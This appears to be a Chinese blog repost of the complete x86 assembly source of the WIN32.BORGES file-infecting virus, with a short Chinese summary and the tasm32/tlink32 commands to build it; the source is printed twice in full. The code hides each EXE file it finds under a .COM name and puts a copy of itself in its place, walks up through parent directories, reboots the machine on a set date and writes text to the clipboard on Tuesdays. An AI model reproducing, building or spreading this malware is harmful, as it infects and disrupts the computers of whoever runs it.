博客介绍了WIN32.BORGES病毒,该病毒会镜像EXE文件、遍历目录,在9月19日重启机器,周二在剪贴板放文本,使用API操作。还给出了病毒代码的编译方法,包含tasm32和tlink32命令,代码中调用多个API函数实现病毒功能。
; ----------------> WIN32.BORGES Virus by Int13h/IKX <-----------------;
; It mirrores EXEs files, navegates directories with the famous dot-dot;
; method, on september 19 reboots the machine; on tuesdays puts a text;
; in the clipboard. This beast works using API for all its operations,;
; no dirty tricks are used. Just to mantain compatibility :);
; Dedicated to Jorge Luis Borges, because the first tale of his book;
; named "The book of sand" is called "The other", and it speaks about;
; an encounter with a younger copy of himself. The famous doppelganger.;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -;
; ;
; COMPILATION: ;
; tasm32 /ml /m3 borges.asm,,; ;
; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ;
;
.386
.model flat
locals
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn SetCurrentDirectoryA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetSystemTime:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn GlobalAlloc:PROC
extrn GlobalLock:PROC
extrn GlobalUnlock:PROC
extrn OpenClipboard:PROC
extrn SetClipboardData:PROC
extrn EmptyClipboard:PROC
extrn CloseClipboard:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn ExitWindowsEx:PROC
extrn ExitProcess:PROC
.DATA
TituloVentana db 'WIN32.BORGES VIRUS by Int13h/IKX',0
TextoVentana db 'Made in Paraguay, South America',0
MemHandle dd 0
Victimas db '*.EXE',0
SearcHandle dd 0
Longitud dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
Hallado db 200 dup (0)
Crear db 200 dup (0)
ParaCorrer db 200 dup (0)
Original db 200 dup (0)
Actual db 200 dup (0)
PuntoPunto db '..',0
SystemTimeStruc dw 0,0,0,0,0,0,0,0
.CODE
BORGES: mov eax,offset SystemTimeStruc
push eax
call GetSystemTime
mov ax,word ptr offset [SystemTimeStruc+2]
cmp al,9
jne NoFQVbirthday
mov ax,word ptr offset [SystemTimeStruc+6]
cmp al,17
je Adios
NoFQVbirthday:
push offset Original
push 000000C8h
call GetCurrentDirectoryA
mov dword ptr [Longitud],eax
call GetCommandLineA
push eax
push offset ParaCorrer
call lstrcpyA
mov edi,eax
Buscar: cmp byte ptr [edi],'.'
jz ElPunto
inc edi
jmp Buscar
ElPunto:mov esi,edi
inc esi
add edi,4
mov byte ptr [edi],00
Carrousell:
call InfectDirectory
push offset PuntoPunto
call SetCurrentDirectoryA
push offset Actual
push 000000C8h
call GetCurrentDirectoryA
cmp eax,dword ptr [Longitud]
je Salida
mov dword ptr [Longitud],eax
jmp Carrousell
InfectDirectory:
push offset Win32FindData
push offset Victimas
call FindFirstFileA
mov dword ptr [SearcHandle],eax
Ciclo: cmp eax,-1
je Salida
or eax,eax
jnz Continuar
ret
Continuar:
push offset Hallado
push offset Crear
call lstrcpyA
mov edi,offset Crear
SeguirBuscando:
cmp byte ptr [edi],'.'
jz PuntoEncontrado
inc edi
jmp SeguirBuscando
PuntoEncontrado:
inc edi
mov dword ptr [edi],0004d4f43h
push offset Crear
push offset Hallado
call MoveFileA
push 0
push offset Hallado
push offset ParaCorrer+1
call CopyFileA
push offset Win32FindData
push dword ptr [SearcHandle]
call FindNextFileA
jmp Ciclo
FillClipboard:
push 0
call OpenClipboard
call EmptyClipboard
push (offset TextoVentana-offset TituloVentana)
push 00000002 ; GMEM_MOVEABLE
call GlobalAlloc
push eax
mov dword ptr [MemHandle],eax
call GlobalLock
push eax
push offset TituloVentana
push eax
call lstrcpyA
call GlobalUnlock
push dword ptr [MemHandle]
push 00000001 ; CF_TEXT
call SetClipboardData
call CloseClipboard
jmp Run4theNight
Adios: push 00000001
push offset TituloVentana
push offset TextoVentana
push 0
call MessageBoxA
push 0
push 00000002 ; EWX_REBOOT
call ExitWindowsEx
Salida: push offset Original
call SetCurrentDirectoryA
mov ax,word ptr offset [SystemTimeStruc+4]
cmp al,2
je FillClipboard
Run4theNight:
push offset ProcessInfo
push offset StartupInfo
sub eax,eax
push eax
push eax
push 00000010h
push eax
push eax
push eax
call GetCommandLineA
inc eax
push eax
Done: mov dword ptr [esi],0004d4f43h
push offset ParaCorrer+1
call CreateProcessA
push 0
call ExitProcess
Ends
End BORGES
; It mirrores EXEs files, navegates directories with the famous dot-dot;
; method, on september 19 reboots the machine; on tuesdays puts a text;
; in the clipboard. This beast works using API for all its operations,;
; no dirty tricks are used. Just to mantain compatibility :);
; Dedicated to Jorge Luis Borges, because the first tale of his book;
; named "The book of sand" is called "The other", and it speaks about;
; an encounter with a younger copy of himself. The famous doppelganger.;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -;
; ;
; COMPILATION: ;
; tasm32 /ml /m3 borges.asm,,; ;
; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ;
;
.386
.model flat
locals
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn SetCurrentDirectoryA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetSystemTime:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn GlobalAlloc:PROC
extrn GlobalLock:PROC
extrn GlobalUnlock:PROC
extrn OpenClipboard:PROC
extrn SetClipboardData:PROC
extrn EmptyClipboard:PROC
extrn CloseClipboard:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn ExitWindowsEx:PROC
extrn ExitProcess:PROC
.DATA
TituloVentana db 'WIN32.BORGES VIRUS by Int13h/IKX',0
TextoVentana db 'Made in Paraguay, South America',0
MemHandle dd 0
Victimas db '*.EXE',0
SearcHandle dd 0
Longitud dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
Hallado db 200 dup (0)
Crear db 200 dup (0)
ParaCorrer db 200 dup (0)
Original db 200 dup (0)
Actual db 200 dup (0)
PuntoPunto db '..',0
SystemTimeStruc dw 0,0,0,0,0,0,0,0
.CODE
BORGES: mov eax,offset SystemTimeStruc
push eax
call GetSystemTime
mov ax,word ptr offset [SystemTimeStruc+2]
cmp al,9
jne NoFQVbirthday
mov ax,word ptr offset [SystemTimeStruc+6]
cmp al,17
je Adios
NoFQVbirthday:
push offset Original
push 000000C8h
call GetCurrentDirectoryA
mov dword ptr [Longitud],eax
call GetCommandLineA
push eax
push offset ParaCorrer
call lstrcpyA
mov edi,eax
Buscar: cmp byte ptr [edi],'.'
jz ElPunto
inc edi
jmp Buscar
ElPunto:mov esi,edi
inc esi
add edi,4
mov byte ptr [edi],00
Carrousell:
call InfectDirectory
push offset PuntoPunto
call SetCurrentDirectoryA
push offset Actual
push 000000C8h
call GetCurrentDirectoryA
cmp eax,dword ptr [Longitud]
je Salida
mov dword ptr [Longitud],eax
jmp Carrousell
InfectDirectory:
push offset Win32FindData
push offset Victimas
call FindFirstFileA
mov dword ptr [SearcHandle],eax
Ciclo: cmp eax,-1
je Salida
or eax,eax
jnz Continuar
ret
Continuar:
push offset Hallado
push offset Crear
call lstrcpyA
mov edi,offset Crear
SeguirBuscando:
cmp byte ptr [edi],'.'
jz PuntoEncontrado
inc edi
jmp SeguirBuscando
PuntoEncontrado:
inc edi
mov dword ptr [edi],0004d4f43h
push offset Crear
push offset Hallado
call MoveFileA
push 0
push offset Hallado
push offset ParaCorrer+1
call CopyFileA
push offset Win32FindData
push dword ptr [SearcHandle]
call FindNextFileA
jmp Ciclo
FillClipboard:
push 0
call OpenClipboard
call EmptyClipboard
push (offset TextoVentana-offset TituloVentana)
push 00000002 ; GMEM_MOVEABLE
call GlobalAlloc
push eax
mov dword ptr [MemHandle],eax
call GlobalLock
push eax
push offset TituloVentana
push eax
call lstrcpyA
call GlobalUnlock
push dword ptr [MemHandle]
push 00000001 ; CF_TEXT
call SetClipboardData
call CloseClipboard
jmp Run4theNight
Adios: push 00000001
push offset TituloVentana
push offset TextoVentana
push 0
call MessageBoxA
push 0
push 00000002 ; EWX_REBOOT
call ExitWindowsEx
Salida: push offset Original
call SetCurrentDirectoryA
mov ax,word ptr offset [SystemTimeStruc+4]
cmp al,2
je FillClipboard
Run4theNight:
push offset ProcessInfo
push offset StartupInfo
sub eax,eax
push eax
push eax
push 00000010h
push eax
push eax
push eax
call GetCommandLineA
inc eax
push eax
Done: mov dword ptr [esi],0004d4f43h
push offset ParaCorrer+1
call CreateProcessA
push 0
call ExitProcess
Ends
End BORGES
扫一扫
1147
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
